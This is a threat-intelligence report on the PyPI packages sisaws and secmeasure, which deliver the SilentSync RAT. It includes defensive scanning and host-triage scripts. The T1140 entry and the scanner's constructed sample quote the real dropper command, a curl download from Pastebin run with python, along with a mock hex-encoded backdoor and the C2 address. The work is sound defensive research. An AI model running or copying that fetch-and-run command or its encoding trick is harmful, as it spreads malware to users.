Malicious PyPI Packages Deliver SilentSync RAT


Zscaler ThreatLabz discovered two malicious PyPI packages, sisaws and secmeasure, that deliver SilentSync, a Python-based RAT providing remote command execution, file exfiltration, screen capture, and browser data theft. The packages rely on typosquatting and a Pastebin-hosted payload fetched via a hex-decoded curl command; the payload is retrieved from the Pastebin raw URL https://pastebin[.]com/raw/jaH2uRE1, and SilentSync communicates with its C2 server at 200.58.107[.]25.

Keypoints

  • ThreatLabz identified malicious PyPI packages sisaws and secmeasure in August 2025 that install SilentSync, a Python RAT retrieved from Pastebin.
  • sisaws impersonates the legitimate sisa package (typosquatting) by mimicking modules puco and renaper while embedding a backdoor gen_token function with a hardcoded token.
  • Both packages execute a hex-decoded curl command to download and run helper.py from https://pastebin[.]com/raw/jaH2uRE1, currently targeting Windows installations.
  • SilentSync supports persistence across OSes (Windows registry Run key, Linux crontab @reboot, macOS LaunchAgents) though the PyPI installers only infect Windows.
  • SilentSync’s features include remote command execution, file/directory exfiltration (ZIP support), screenshot capture, and browser data theft (credentials, cookies, history, autofill) from Chromium-family browsers and Firefox.
  • Network C2 uses HTTP REST endpoints (/checkin, /comando, /respuesta, /archivo) over TCP port 5000 to an IP address 200.58.107[.]25 decoded from Base64.
  • IOC artifacts documented include package MD5 hashes for sisaws and secmeasure, the SilentSync sample hash, the Pastebin raw URL, and the hardcoded C2 IP address.
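The key points above describe the encoding trick that hides the dropper: a hex string that decodes to a curl-and-python chain, and a Base64 string that decodes to the C2 address. The following static check is an added example (not ThreatLabz tooling or code from the packages) that walks every string literal in a Python file, tries hex and Base64 decoding, and flags literals that decode to a download-and-run command, an IPv4 address, or one of the report's indicators. The sample source it scans is constructed here to mimic the reported sisaws layout (a gen_token gate, an encoded command, an encoded C2 address) and is only parsed, never executed; the token value, the benign digest literal and the function names are assumptions.

```python
"""Static check for the encoded download-and-run pattern attributed to sisaws/secmeasure:
string literals that hex- or Base64-decode to a curl/python chain or an IPv4 address."""
import ast
import base64
import binascii
import re
import sys

# Indicators taken from the report. Everything else in this file is an assumption
# made for this example; it is not ThreatLabz tooling.
KNOWN_PAYLOAD_URL = "pastebin.com/raw/jaH2uRE1"
KNOWN_C2_IP = "200.58.107.25"

# Substrings that make a decoded literal suspicious on their own.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "pastebin.com/raw", "%TEMP%", "&& python")

HEX_RE = re.compile(r"^[0-9a-fA-F]{32,}$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def decode_candidates(literal):
    """Yield (encoding, text) for each way the literal plausibly decodes."""
    if HEX_RE.match(literal):
        try:
            yield "hex", bytes.fromhex(literal).decode("utf-8", "replace")
        except ValueError:
            pass
    if B64_RE.match(literal):
        try:
            yield "base64", base64.b64decode(literal, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            pass


def classify(text):
    """Return the reasons a decoded string is worth flagging (empty list = benign)."""
    reasons = [tok for tok in SUSPICIOUS_TOKENS if tok in text]
    if KNOWN_PAYLOAD_URL in text:
        reasons.append("known payload URL")
    if IPV4_RE.match(text.strip()):
        reasons.append("encoded IPv4 address")
        if text.strip() == KNOWN_C2_IP:
            reasons.append("known C2 IP")
    return reasons


def scan_source(source, filename="<string>"):
    """Walk every string constant in a Python file and report the ones that decode
    to something suspicious. Returns a list of dicts; an empty list means clean."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        for encoding, text in decode_candidates(node.value):
            reasons = classify(text)
            if reasons:
                findings.append({"file": filename, "line": node.lineno,
                                 "encoding": encoding, "reasons": reasons,
                                 "decoded": text[:120]})
    return findings


# Constructed sample mimicking the report's description of the sisaws backdoor:
# a gen_token() gate, a hex literal hiding the curl chain quoted in the report,
# and a Base64 literal hiding the C2 address. The benign digest literal checks
# that an ordinary 32-hex-char hash is not reported. Parsed only, never executed.
_CMD = r"curl -sL https://pastebin.com/raw/jaH2uRE1 -o %TEMP%\helper.py && python %TEMP%\helper.py"
SAMPLE_SOURCE = '''
PACKAGE_DIGEST = "00112233445566778899aabbccddeeff"   # constructed benign hash

def gen_token(token):
    if token == "CONSTRUCTED-HARDCODED-TOKEN":
        cmd = bytes.fromhex("{hex_cmd}").decode()   # the report: decoded, then run
        return cmd

C2 = "{b64_ip}"
'''.format(hex_cmd=_CMD.encode().hex(),
           b64_ip=base64.b64encode(KNOWN_C2_IP.encode()).decode())


def main(paths):
    """Scan the files given on the command line (default: the constructed sample)."""
    results = []
    if not paths:
        results = scan_source(SAMPLE_SOURCE, "sample.py")
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            try:
                results.extend(scan_source(fh.read(), path))
            except SyntaxError as exc:
                print(f"{path}: skipped, not parseable as Python ({exc})")
    for f in results:
        print(f"{f['file']}:{f['line']} [{f['encoding']}] {', '.join(f['reasons'])}")
        print("    decoded: " + f["decoded"])
    return results


if __name__ == "__main__":
    main(sys.argv[1:])
```

Run it against the contents of a freshly downloaded wheel or sdist (`python scan.py pkg/*.py`) before installing. The check deliberately decodes anything that looks like hex or Base64 rather than matching the two known indicators alone, so a repackaged variant with a different Pastebin path or C2 address still surfaces as "encoded IPv4 address" or a curl/python chain.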

MITRE Techniques

  • [T1547] Boot or Logon Autostart Scripts – Enables persistence by creating OS-specific autostart mechanisms: “On Windows, SilentSync creates a registry entry under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key with the name PyHelper… On Linux, SilentSync modifies the crontab with an @reboot directive… For macOS, SilentSync generates a com.apple.pyhelper.plist file in the ~/Library/LaunchAgents directory.”
  • [T1555] Credentials from Password Stores – Extracts stored browser credentials and other browser data: “SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox.”
  • [T1071] Application Layer Protocol – C2 communication over HTTP using a REST API: “SilentSync communicates with its C2 server over HTTP to a hardcoded server whose IP address (200.58.107[.]25) is stored in Base64… The REST endpoints…/checkin /comando /respuesta /archivo.”
  • [T1140] Deobfuscate/Decode Files or Information – Decodes or deobfuscates payload retrieval commands and payloads at runtime: “If the correct token is provided, the code will decode a hexadecimal string that reveals a curl command… curl -sL https://pastebin.com/raw/jaH2uRE1 -o %TEMP%\helper.py && python %TEMP%\helper.py.”
  • [T1082] System Information Discovery – Collects system information to inform actions: “SilentSync is capable of harvesting browser data, executing shell commands, capturing screenshots, and stealing files,” which implies system discovery to tailor further actions.
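The T1547 entry names three concrete persistence artifacts: a Run value called PyHelper under HKCU, a crontab @reboot line, and a com.apple.pyhelper.plist LaunchAgent. The script below is an added example (not ThreatLabz tooling) that checks a host for those artifacts. Collection is separated from evaluation so the evaluation logic can be exercised on constructed data: the sample Run values, crontab text and LaunchAgent listing are made up here, and the heuristic that any Run value or @reboot entry launching a Python "helper" script is worth review is this example's own assumption, not a statement from the report.

```python
"""Host triage for the autostart artifacts the report attributes to SilentSync."""
import os
import platform
import subprocess

# Artifact names from the report. The matching rules below are this example's own.
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE_NAME = "PyHelper"
LAUNCH_AGENT = "com.apple.pyhelper.plist"


def evaluate(run_values=None, crontab_text="", launch_agents=()):
    """Return a list of human-readable findings from already-collected data.

    run_values:    {value_name: command} read from HKCU\\...\\Run
    crontab_text:  the current user's crontab as text
    launch_agents: file names present in ~/Library/LaunchAgents
    """
    findings = []
    for name, cmd in (run_values or {}).items():
        low = cmd.lower()
        if name.lower() == RUN_VALUE_NAME.lower():
            findings.append(f"HKCU Run value '{name}' matches reported name -> {cmd}")
        elif "python" in low and "helper.py" in low:
            # Assumed heuristic: same launch shape under a renamed value.
            findings.append(f"HKCU Run value '{name}' launches a python helper script -> {cmd}")
    for line in crontab_text.splitlines():
        entry = line.strip()
        if entry.startswith("@reboot") and ("python" in entry or entry.endswith(".py")):
            findings.append(f"crontab @reboot entry runs python: {entry}")
    for fname in launch_agents:
        if fname == LAUNCH_AGENT:
            findings.append(f"LaunchAgent {fname} present in ~/Library/LaunchAgents")
    return findings


def collect_windows_run_values():
    """Enumerate HKCU Run values (Windows only; winreg is imported lazily)."""
    import winreg
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:
                    break
                values[name] = str(data)
                index += 1
    except OSError:
        pass
    return values


def collect_crontab():
    """Return the current user's crontab text, or '' if none/unavailable."""
    try:
        proc = subprocess.run(["crontab", "-l"], capture_output=True, text=True, check=False)
        return proc.stdout
    except FileNotFoundError:
        return ""


def collect_launch_agents():
    """List ~/Library/LaunchAgents (empty outside macOS or if the directory is absent)."""
    path = os.path.expanduser("~/Library/LaunchAgents")
    return os.listdir(path) if os.path.isdir(path) else []


# Constructed sample data for exercising evaluate() without touching the host.
SAMPLE_RUN_VALUES = {
    "OneDrive": r"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "PyHelper": r"python C:\Users\u\AppData\Local\Temp\helper.py",
}
SAMPLE_CRONTAB = "0 3 * * * /usr/local/bin/backup.sh\n@reboot python3 /home/u/.cache/helper.py\n"
SAMPLE_LAUNCH_AGENTS = ["com.apple.pyhelper.plist", "com.vendor.updater.plist"]


def main():
    system = platform.system()
    if system == "Windows":
        findings = evaluate(run_values=collect_windows_run_values())
    elif system == "Darwin":
        findings = evaluate(crontab_text=collect_crontab(), launch_agents=collect_launch_agents())
    else:
        findings = evaluate(crontab_text=collect_crontab())
    print("\n".join(findings) if findings else "no SilentSync persistence artifacts found")
    return findings


if __name__ == "__main__":
    main()
```

On a live host the script only reads the three locations the report names; a hit on the PyHelper value or the com.apple.pyhelper.plist file should be treated as a strong indicator, while the generic python-helper heuristics are there to catch a renamed variant and will need an analyst's review.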

Indicators of Compromise

  • [MD5] PyPI package samples – sisaws package MD5: 327233d73236ca4d7c18ffd8f9924127; secmeasure package MD5: 9a092bbfc5325cbfca2f9807d074616a.
  • [MD5] Malware sample – SilentSync RAT MD5: 3918cace55342909c8309ec37d0207fd.
  • [URL] Payload download – Pastebin raw URL used to fetch helper.py: https://pastebin[.]com/raw/jaH2uRE1.
  • [IP] Command-and-control server – Hardcoded C2 IP: 200.58.107[.]25 (C2 over HTTP, REST API on port 5000).
  • [File/Path] Temporary helper script – helper.py written to %TEMP%\helper.py after curl download (Windows execution context).


Read more: https://www.zscaler.com/blogs/security-research/malicious-pypi-packages-deliver-silentsync-rat